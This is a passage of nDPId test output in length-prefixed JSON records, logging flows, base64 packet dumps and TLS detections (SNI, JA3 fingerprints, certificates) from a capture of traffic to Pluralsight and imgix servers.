G2","subjectDN":"OU=Domain Control Validated, CN=*.pluralsight.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"31:0B:3D:03:7A:6A:F8:86:8F:CE:62:30:E9:A2:F1:47:E5:6C:3D:F7"}} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373357854,"flow_last_seen":1648373357854,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373357854,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1648373357854,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357854,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8tRVAAEAG8mLAqAGAkks+0KceAbt\/83TdAAAAAKAC+vCjygAAAgQFtAQCCAquLcooAAAAAAEDAwc="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373357861,"flow_last_seen":1648373357861,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373357861,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1648373357861,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357861,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA85z1AAEAGwDrAqAGAkks+0KcmAbuYBq2TAAAAAKAC+vBS8wAAAgQFtAQCCAquLcouAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1648373357870,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357870,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGrniSSz7QwKgBgAG7px6MpPZof\/N03qAS\/\/\/QggAAAgQFTAQCCApC6QiXri3KKAEDAwk="} +01170{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1648373357870,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373357870,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5tRdAAEAG8GPAqAGAkks+0KceAbt\/83TejKT2aYAYAfY+HwAAAQEICq4tyjdC6QiXFgMBAgABAAH8AwNByQDZoxI4dOK0Sqz8YqFtpt\/EgjJNogy+qC4qHtET5yBBjqjV\/zD\/ZZYcaXw3kK2L11Av5ASkLtB9CBYWZu3HRgAg2toTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTGhoAAAAAABsAGQAAFnBsdXJhbHNpZ2h0Mi5pbWdpeC5uZXQAFwAA\/wEAAQAACgAKAAh6egAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKXp6AAEAAB0AICyryrnXcbLoAjfLxc89+emszCPBlJNQz9WtPrwFSKZoAC0AAgEBACsABwZ6egMEAwMAGwADAgACRGkABQADAmgySkoAAQAAFQDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373357854,"flow_last_seen":1648373357870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373357870,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1648373357879,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373357879,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGrniSSz7QwKgBgAG7pyYtR\/VLmAatlKAS\/\/8fEgAAAgQFTAQCCAr1hBcPri3KLgEDAwk="} 
+01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1648373357879,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373357879,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI55z9AAEAGvjvAqAGAkks+0KcmAbuYBq2ULUf1TIAYAfb0QgAAAQEICq4tykD1hBcPFgMBAgABAAH8AwMVCkjcl1ldHYszMMhbvCrBmyAv89Ky2j4DTP7XcUyMOSBZfmcNBQmySrBYu\/Xc6jDaJEswZCfnt+SXnGDnGRc5VwAgCgoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTSkoAAAAAABoAGAAAFXBsdXJhbHNpZ2h0LmltZ2l4Lm5ldAAXAAD\/AQABAAAKAAoACBoaAB0AFwAYAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAANABIAEAQDCAQEAQUDCAUFAQgGBgEAEgAAADMAKwApGhoAAQAAHQAgibFRT+4ffFiWVzdt9+CHYgJvYueRYWReY4H44PP66lMALQACAQEAKwAHBurqAwQDAwAbAAMCAAJEaQAFAAMCaDJaWgABAAAVAMIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373357861,"flow_last_seen":1648373357879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373357879,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373357854,"flow_last_seen":1648373357887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1648373357887,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +01212{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373357854,"flow_last_seen":1648373357887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1648373357887,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pluralsight2.imgix.net","server_names":"*.imgix.com,*.imgix.net,imgix.com,imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.imgix.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C6:A8:D1:F3:16:08:C6:7F:9F:58:B9:3B:87:A6:A1:75:BC:67:F8:8D"}} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373357861,"flow_last_seen":1648373357901,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1648373357901,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} 
+01211{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373357861,"flow_last_seen":1648373357901,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1648373357901,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.208","src_port":42790,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pluralsight.imgix.net","server_names":"*.imgix.com,*.imgix.net,imgix.com,imgix.net","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.imgix.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C6:A8:D1:F3:16:08:C6:7F:9F:58:B9:3B:87:A6:A1:75:BC:67:F8:8D"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373358908,"flow_last_seen":1648373358908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373358908,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1648373358908,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373358908,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8pPxAAEAG95PAqAGAEsvJOKZ6AbsXjcxKAAAAAKAC+vDGJwAAAgQFtAQCCAq7LqF\/AAAAAAEDAwc="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1648373358948,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373358948,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAAOUG948Sy8k4wKgBgAG7pnpgCgHJF43MS6ASaN+FjQAAAgQFtAQCCAqVXttnuy6hfwEDAwg="} +01170{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1648373358949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1648373358949,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5pP5AAEAG9ZTAqAGAEsvJOKZ6AbsXjcxLYAoByoAYAfahVQAAAQEICrsuoaiVXttnFgMBAgABAAH8AwPQaIxCQafGfU7U68BjTWz12bgC7rPMRDrwBcYKkg2BtiCsXEdEYhfEEMAlvDmVmL\/9\/3dvAf\/ZUZkvazPc8sBEAwAg6uoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGTenoAAAAAABgAFgAAE3N0dC5wbHVyYWxzaWdodC5jb20AFwAA\/wEAAQAACgAKAAhaWgAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKVpaAAEAAB0AIC1NIbYz00S\/PDWD2znXWT+4vqGbUzfdyPQt1wB6uPFJAC0AAgEBACsABwb6+gMEAwMAGwADAgACRGkABQADAmgyuroAAQAAFQDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373358908,"flow_last_seen":1648373358949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373358949,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00966{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":31,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373358908,"flow_last_seen":1648373358988,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1648373358988,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +01250{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1648373358908,"flow_last_seen":1648373358992,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4861,"flow_avg_l4_payload_len":810,"midstream":0,"thread_ts_msec":1648373358992,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.203.201.56","src_port":42618,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"stt.pluralsight.com","server_names":"stt.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Jose, O=Adobe Systems Incorporated, CN=stt.pluralsight.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2","fingerprint":"C5:A3:DE:6D:71:B1:15:77:EC:86:38:E6:30:1C:F5:AC:18:9D:BE:82"}} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373359576,"flow_last_seen":1648373359576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373359576,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1648373359576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373359576,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8TutAAEAGHxbAqAGAaBOif780Abvdb02GAAAAAKAC+vDHywAAAgQFtAQCCArb1PDNAAAAAAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1648373359597,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1648373359597,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkGdQloE6J\/wKgBgAG7vzSUVFy03W9Nh4AS\/\/\/FjwAAAgQFeAEBBAIBAwMK"} 
+01152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1648373359600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1648373359600,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItTu1AAEAGHSPAqAGAaBOif780Abvdb02HlFRctVAYAfYwgAAAFgMBAgABAAH8AwOIgQTFWwPXqiGWcEl1+ZXYiujgmOb6nQAZYCe\/QQpLyiA8RROCb85LShovAJOvtUQPlP7tKhROlf321DTdV6NmHgAgysoTARMCEwPAK8AvwCzAMMypzKjAE8AUAJwAnQAvADUBAAGT2toAAAAAABgAFgAAE3d3dy5wbHVyYWxzaWdodC5jb20AFwAA\/wEAAQAACgAKAAgKCgAdABcAGAALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAADQASABAEAwgEBAEFAwgFBQEIBgYBABIAAAAzACsAKQoKAAEAAB0AIEbEu4abSNoKA92bDrKiGkIvMOu6w9kvXP7U129h\/FVaAC0AAgEBACsABwaamgMEAwMAGwADAgACRGkABQADAmgyGhoAAQAAFQDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} +00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1648373359576,"flow_last_seen":1648373359600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1648373359600,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":40,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648373359576,"flow_last_seen":1648373359621,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1648373359621,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.19.162.127","src_port":48948,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pluralsight","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.pluralsight.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648373359646,"flow_last_seen":1648373359646,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648373359646,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.17.209.240","src_port":44770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1648373359646,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648373359646,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8yIlAAEAGdgjAqAGAaBHR8K7iAbvIMdGjAAAAAKAC+vD8DgAAAgQFtAQCCArhZSj9AAAAAAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"pluralsight.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1648373359662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1648373359662,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkGRZpoEdHwwKgBgAG7ruI30m4VyDHRpIAS\/\/+CtAAAAgQFeAEBBAIBAwMK"} 